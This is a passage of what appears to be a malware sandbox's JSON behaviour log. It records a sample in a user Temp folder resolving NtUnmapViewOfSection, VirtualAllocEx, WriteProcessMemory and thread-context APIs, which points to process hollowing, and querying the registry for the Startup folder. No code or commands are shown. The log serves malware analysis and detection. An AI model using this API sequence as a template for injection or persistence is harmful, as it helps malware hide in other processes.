"ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 512 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407927", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 513 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040792a", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtUnmapViewOfSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c3480" } ], "repeated": 0, "id": 514 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040793e", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 515 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407941", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAllocEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897390" } ], "repeated": 0, "id": 516 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407955", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 517 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407958", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758975e0" } ], "repeated": 0, "id": 518 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040796c", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 519 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x0040796f", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895c70" } ], "repeated": 0, "id": 520 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407983", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 521 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407986", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758970c0" } ], "repeated": 0, "id": 522 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407994", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 523 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407997", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResumeThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881b90" } ], "repeated": 0, "id": 524 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079ab", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 525 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079ae", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SuspendThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897230" } ], "repeated": 0, "id": 526 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079c2", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 527 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079c5", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TerminateProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879910" } ], "repeated": 0, "id": 528 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079d9", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 529 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079dc", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 530 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079f3", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 531 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x004079f6", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtReadVirtualMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c35d0" } ], "repeated": 0, "id": 532 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a0a", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 533 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a0d", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsWow64Process" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880980" } ], "repeated": 0, "id": 534 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a21", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 535 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a24", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808d0" } ], "repeated": 0, "id": 536 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a32", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 537 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a35", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DuplicateHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883160" } ], "repeated": 0, "id": 538 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x0040941c", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "psapi.dll" }, { "name": "BaseAddress", "value": "0x76280000" } ], "repeated": 0, "id": 539 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a48", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "psapi.dll" }, { "name": "ModuleHandle", "value": "0x76280000" }, { "name": "FunctionName", "value": "GetProcessMemoryInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76281480" } ], "repeated": 0, "id": 540 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a58", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 541 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a5b", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882010" } ], "repeated": 0, "id": 542 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a6e", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 543 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00407a71", "parentcaller": "0x0040941c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 544 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408c6f", "parentcaller": "0x0040941c", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "5", "pretty_value": "FILE_OVERWRITE_IF" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 545 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408c90", "parentcaller": "0x0040941c", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x40100080", "pretty_value": "GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "2", "pretty_value": "FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 546 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408cb1", "parentcaller": "0x0040941c", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 547 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408cd4", "parentcaller": "0x0040941c", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000043", "pretty_return": "SHARING_VIOLATION", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x40100080", "pretty_value": "GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "2", "pretty_value": "FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 548 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408ce3", "parentcaller": "0x0040941c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0xffffffff" } ], "repeated": 1, "id": 549 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408cea", "parentcaller": "0x0040941c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 550 }, { "timestamp": "2025-03-02 21:32:28,706", "thread_id": "4148", "caller": "0x00408cee", "parentcaller": "0x0040941c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0xffffffff" } ], "repeated": 0, "id": 551 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x000002c0" } ], "repeated": 0, "id": 552 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 553 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "\\x98\\x19\\x19\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 554 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 555 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000120" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 556 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000280" }, { "name": "ObjectAttributesName", "value": "{B97D20BB-F46A-4C97-BA10-5E3608430854}" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}" } ], "repeated": 0, "id": 557 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 558 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Category" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Category" } ], "repeated": 0, "id": 559 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Name" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Startup" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Name" } ], "repeated": 0, "id": 560 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParentFolder" } ], "repeated": 0, "id": 561 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Description" } ], "repeated": 0, "id": 562 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "StartUp" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\RelativePath" } ], "repeated": 0, "id": 563 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\ParsingName" } ], "repeated": 0, "id": 564 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InfoTip" } ], "repeated": 0, "id": 565 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "Type", "value": "2", "pretty_value": "REG_EXPAND_SZ" }, { "name": "Information", "value": "@%SystemRoot%\\system32\\shell32.dll,-21787" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalizedName" } ], "repeated": 0, "id": 566 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Icon" } ], "repeated": 0, "id": 567 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Security" } ], "repeated": 0, "id": 568 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResource" } ], "repeated": 0, "id": 569 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\StreamResourceType" } ], "repeated": 0, "id": 570 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": 